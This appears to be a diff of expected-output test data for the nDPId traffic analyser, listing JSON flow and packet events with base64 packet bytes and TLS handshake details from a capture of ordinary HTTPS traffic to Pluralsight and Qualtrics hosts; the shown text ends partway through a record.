-00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1648373358908,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373358908,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8pPxAAEAG95PAqAGAEsvJOKZ6AbsXjcxKAAAAAKAC+vDGJwAAAgQFtAQCCAq7LqF\/AAAAAAEDAwc="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1648373358948,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373358948,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAAOUG948Sy8k4wKgBgAG7pnpgCgHJF43MS6ASaN+FjQAAAgQFtAQCCAqVXttnuy6hfwEDAwg="} -01170{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1648373358949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1648373358949,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5pP5AAEAG9ZTAqAGAEsvJOKZ6AbsXjcxLYAoByoAYAfahVQAAAQEICrsuoaiVXttnFgMBAgABAAH8AwPQaIxCQafGfU7U68BjTWz12bgC7rPMRDrwBcYKkg2BtiCsXEdEYhfEEMAlvDmVmL\/9\/3dvAf\/ZUZkvazPc8sBEAwAg6uoTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGTenoAAAAAABgAFgAAE3N0dC5wbHVyYWxzaWdodC5jb20AFwAA\/wEAAQAACgAKAAhaWgAdABcAGAALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAADQASABAEAwgEBAEFAwgFBQEIBgYBABIAAAAzACsAKVpaAAEAAB0AIC1NIbYz00S\/PDWD2znXWT+4vqGbUzfdyPQt1wB6uPFJAC0AAgEBACsABwb6+gMEAwMAGwADAgACRGkABQADAmgyuroAAQAAFQDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373358908,"flow_last_seen":1648373358949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373358949,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.203.201.56","src_port":42618,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"stt.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -00966{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":31,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373358908,"flow_last_seen":1648373358988,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1648373358988,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.203.201.56","src_port":42618,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"stt.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -01250{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":33,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1648373358908,"flow_last_seen":1648373358992,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4861,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1648373358992,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.203.201.56","src_port":42618,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"stt.pluralsight.com","server_names":"stt.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=California, L=San Jose, O=Adobe Systems Incorporated, CN=stt.pluralsight.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"C5:A3:DE:6D:71:B1:15:77:EC:86:38:E6:30:1C:F5:AC:18:9D:BE:82"}} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648373359576,"flow_last_seen":1648373359576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648373359576,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.19.162.127","src_port":48948,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1648373359576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373359576,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8TutAAEAGHxbAqAGAaBOif780Abvdb02GAAAAAKAC+vDHywAAAgQFtAQCCArb1PDNAAAAAAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1648373359597,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1648373359597,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0AABAADkGdQloE6J\/wKgBgAG7vzSUVFy03W9Nh4AS\/\/\/FjwAAAgQFeAEBBAIBAwMK"} 
-01152{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1648373359600,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1648373359600,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItTu1AAEAGHSPAqAGAaBOif780Abvdb02HlFRctVAYAfYwgAAAFgMBAgABAAH8AwOIgQTFWwPXqiGWcEl1+ZXYiujgmOb6nQAZYCe\/QQpLyiA8RROCb85LShovAJOvtUQPlP7tKhROlf321DTdV6NmHgAgysoTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGT2toAAAAAABgAFgAAE3d3dy5wbHVyYWxzaWdodC5jb20AFwAA\/wEAAQAACgAKAAgKCgAdABcAGAALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAADQASABAEAwgEBAEFAwgFBQEIBgYBABIAAAAzACsAKQoKAAEAAB0AIEbEu4abSNoKA92bDrKiGkIvMOu6w9kvXP7U129h\/FVaAC0AAgEBACsABwaamgMEAwMAGwADAgACRGkABQADAmgyGhoAAQAAFQDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373359576,"flow_last_seen":1648373359600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373359600,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.19.162.127","src_port":48948,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":40,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373359576,"flow_last_seen":1648373359621,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1648373359621,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.19.162.127","src_port":48948,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648373359646,"flow_last_seen":1648373359646,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648373359646,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.17.209.240","src_port":44770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1648373359646,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373359646,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8yIlAAEAGdgjAqAGAaBHR8K7iAbvIMdGjAAAAAKAC+vD8DgAAAgQFtAQCCArhZSj9AAAAAAEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1648373359662,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1648373359662,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0AABAADkGRZpoEdHwwKgBgAG7ruI30m4VyDHRpIAS\/\/+CtAAAAgQFeAEBBAIBAwMK"} -01151{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1648373359662,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1648373359662,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItyItAAEAGdBXAqAGAaBHR8K7iAbvIMdGkN9JuFlAYAfapQAAAFgMBAgABAAH8AwNnKyM21\/SbS3Q02cIKvbAgcmV67HQB0KXsoOxxl9v++yDRdtN3P07Qel84K9CWVDBxLwdJHbn9d9oomO2+9M0CRgAgenoTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGTenoAAAAAAD4APAAAOXpuNnF6cTZjYWF1Y3VkZXNyLXBsdXJhbHNpZ2h0LnNpdGVpbnRlcmNlcHQucXVhbHRyaWNzLmNvbQAXAAD\/AQABAAAKAAoACLq6AB0AFwAYAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAANABIAEAQDCAQEAQUDCAUFAQgGBgEAEgAAADMAKwApuroAAQAAHQAgm5zCzvNJzsWd1VyD4DXwZiQmlSanX10JAobLY4rSfTUALQACAQEAKwAHBsrKAwQDAwAbAAMCAAJEaQAFAAMCaDJaWgABAAAVAJ4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373359646,"flow_last_seen":1648373359662,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373359662,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.17.209.240","src_port":44770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zn6qzq6caaucudesr-pluralsight.siteintercept.qualtrics.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -00990{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373359646,"flow_last_seen":1648373359681,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.17.209.240","src_port":44770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"zn6qzq6caaucudesr-pluralsight.siteintercept.qualtrics.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1648373359646,"flow_last_seen":1648373359681,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.17.209.240","src_port":44770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1648373358908,"flow_last_seen":1648373359037,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5045,"flow_avg_l4_payload_len":560,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.203.201.56","src_port":42618,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} 
-00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1648373359576,"flow_last_seen":1648373359621,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.19.162.127","src_port":48948,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1648373357854,"flow_last_seen":1648373357906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":5613,"flow_avg_l4_payload_len":623,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} 
-00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1648373357861,"flow_last_seen":1648373357922,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":5613,"flow_avg_l4_payload_len":623,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42790,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1648373355763,"flow_last_seen":1648373356334,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6491,"flow_avg_l4_payload_len":721,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"54.69.188.18","src_port":42642,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648373355763,"flow_last_seen":1648373355763,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648373355763,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"54.69.188.18","src_port":42642,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1648373355763,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373355763,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8t1dAAEAGzuTAqAGANkW8EqaSAbs5mmmUAAAAAKAC+vDIPgAAAgQFtAQCCAqK+PnbAAAAAAEDAwc="} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1648373355952,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373355952,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAAOAG5js2RbwSwKgBgAG7ppJ9QO7SOZpplaASaN998gAAAgQFtAQCCApSMR4Hivj52wEDAwg="} +01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1648373355952,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1648373355952,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5t1lAAEAGzOXAqAGANkW8EqaSAbs5mmmVfUDu04AYAfbrKAAAAQEICor4+pdSMR4HFgMBAgABAAH8AwM1jCFDKADpkwCWNDdgH\/adXVGzDgYuQsQMuim+6yCdjCAuElAWaAcNbYd22pDJpusrU2oMuj5gm\/t2Aky6e512VAAgamoTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGTSkoAAAAAABQAEgAAD3BsdXJhbHNpZ2h0LmNvbQAXAAD\/AQABAAAKAAoACCoqAB0AFwAYAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAANABIAEAQDCAQEAQUDCAUFAQgGBgEAEgAAADMAKwApKioAAQAAHQAgy0tnman9YKIJBU2tFJ\/X+H4+8C285s8hNvU9rt60YmAALQACAQEAKwAHBgoKAwQDAwAbAAMCAAJEaQAFAAMCaDJqagABAAAVAMgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373355763,"flow_last_seen":1648373355952,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373355952,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"54.69.188.18","src_port":42642,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373355763,"flow_last_seen":1648373356139,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1648373356139,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"54.69.188.18","src_port":42642,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +01308{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1648373355763,"flow_last_seen":1648373356139,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6107,"flow_avg_l4_payload_len":872,"midstream":0,"thread_ts_msec":1648373356139,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"54.69.188.18","src_port":42642,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.com","server_names":"*.pluralsight.com,pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - 